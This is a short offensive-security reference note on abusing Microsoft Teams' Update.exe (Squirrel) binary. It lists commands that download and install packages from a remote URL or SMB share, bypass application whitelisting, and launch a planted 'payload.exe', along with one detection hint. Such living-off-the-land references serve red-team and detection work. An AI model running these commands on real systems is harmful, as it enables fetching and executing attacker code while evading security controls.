~/Privilege Escalation/Windows/Binaries# cat Update.exe.md

Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.

Paths:

%localappdata%\Microsoft\Teams\update.exe

Detection: Update.exe spawned an unknown process

Download

The above binary will go to url and look for RELEASES file and download the nuget package.

Update.exe --download [url to package]

AWL bypass

The above binary will go to url and look for RELEASES file, download and install the nuget package.

Update.exe --update=[url to package]

The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.

Update.exe --update=\\remoteserver\payloadFolder

The above binary will go to url and look for RELEASES file, download and install the nuget package.

Update.exe --updateRollback=[url to package]

Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current. Then run the command. Update.exe will execute the file you copied.

Update.exe --processStart payload.exe --process-start-args "whatever args"

The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.

Update.exe --updateRollback=\\remoteserver\payloadFolder

Execute

The above binary will go to url and look for RELEASES file, download and install the nuget package.

Update.exe --update=[url to package]

The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.

Update.exe --update=\\remoteserver\payloadFolder

The above binary will go to url and look for RELEASES file, download and install the nuget package.

Update.exe --updateRollback=[url to package]

The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.

Update.exe --updateRollback=\\remoteserver\payloadFolder

Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current. Then run the command. Update.exe will execute the file you copied.

Update.exe --processStart payload.exe --process-start-args "whatever args"